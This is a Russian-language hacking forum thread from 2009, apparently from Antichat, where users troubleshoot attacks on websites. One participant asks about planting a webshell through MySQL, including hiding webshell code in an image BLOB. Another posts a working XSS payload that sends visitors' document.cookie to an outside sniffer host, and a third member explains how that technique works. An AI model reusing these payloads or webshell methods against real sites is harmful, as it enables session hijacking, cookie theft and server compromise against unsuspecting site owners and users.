
11.02.2009, 21:02
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
С нами:
11141693
Репутация:
56
|
|
Я тоже так думал... пока не столкнулся с тем что создавая файлы на сервере через вебшел залитый через мускул не вижу на веб сервере))) Вот и возник вопрос - а не лохонулся ли я)))
Последний раз редактировалось tmp; 11.02.2009 в 21:04..
|
|
|

11.02.2009, 21:48
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
2 geezer.code хорошо пусть я буду не прав, тогда обьясните мне как мускул прочитает файл с сервера Б на котором находится если файл физически находится на сервере А?
|
|
|

11.02.2009, 21:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от Gorev
2 geezer.code хорошо пусть я буду не прав, тогда обьясните мне как мускул прочитает файл с сервера Б на котором находится если файл физически находится на сервере А?
никак. а какой именно файл?(может он есть и на сервере Б тоже?).
мускул может работать в контексте конкретной ОС, и читать файлы вы можете только в контексте той ОС где висит мускул.
|
|
|

11.02.2009, 22:58
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
С нами:
11141693
Репутация:
56
|
|
Сообщение от geezer.code
может он есть и на сервере Б тоже?).
.
Так и есть. 
|
|
|

11.02.2009, 23:03
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
С нами:
11141693
Репутация:
56
|
|
В таком случае еще такой вопрос, может кто то уже пробовал такой прикол:
На веб сервере картинки берутся из мускула.
Если вставить в мускул вместо картинки код вебшела - то на вебсервере выполнится пхп код? Правда картинка вставляется в BLOB , не заругается ли мускул если туда пхп код вставить?
|
|
|

12.02.2009, 19:13
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
С нами:
11141693
Репутация:
56
|
|
Сообщение от tmp
В таком случае еще такой вопрос, может кто то уже пробовал такой прикол:
На веб сервере картинки берутся из мускула.
Если вставить в мускул вместо картинки код вебшела - то на вебсервере выполнится пхп код? Правда картинка вставляется в BLOB , не заругается ли мускул если туда пхп код вставить?
ПРобовал на локалхосте. код вставить можно, но на сервере он не выполняется 
Че то я туплю 
Последний раз редактировалось tmp; 12.02.2009 в 19:17..
|
|
|

11.02.2009, 23:52
|
|
Новичок
Регистрация: 10.02.2009
Сообщений: 7
С нами:
9077586
Репутация:
3
|
|
У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\
|
|
|

12.02.2009, 19:24
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от mozarat
У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\
Если на народе страница с редиректом на сниффер, то приходят куки народа
Вот. И не страница с редиректом, а страница, куда встроен javascript, который производит редирект на снифер + document.cookie
А где размещен снифер (а не ядовитая ссылка на него в виде кода javascript) значения не имеет
|
|
|

12.02.2009, 21:14
|
|
Новичок
Регистрация: 10.02.2009
Сообщений: 7
С нами:
9077586
Репутация:
3
|
|
Сообщение от mozarat
У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\
Код присутствующий на странице такой:
PHP код:
<script>img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;</script>
Это в .html
Или еще в .js
PHP код:
img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;
Xss активная прописывается в сообщении. Сайт выполняет код с заданой ссылки(сайта).
Ставил снииффер на lcoalhoste и сайт (двиг самописаный), и куки приходят нормальные.
|
|
|

12.02.2009, 01:47
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
Сайт построен на АЯКС. Нашёл КСС-ку. Но когда пытаюсь отправить данные на сервер методом ПОСТ, то вылетает ошибка:
Ошибка синтаксического анализа XML: ошибка синтаксиса
Адрес: http://hacsite.ru/12.php
Строка 1, символ 1  k
^
что это может быть?
mozarat, покажи свой запрос, что ты составляешь
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|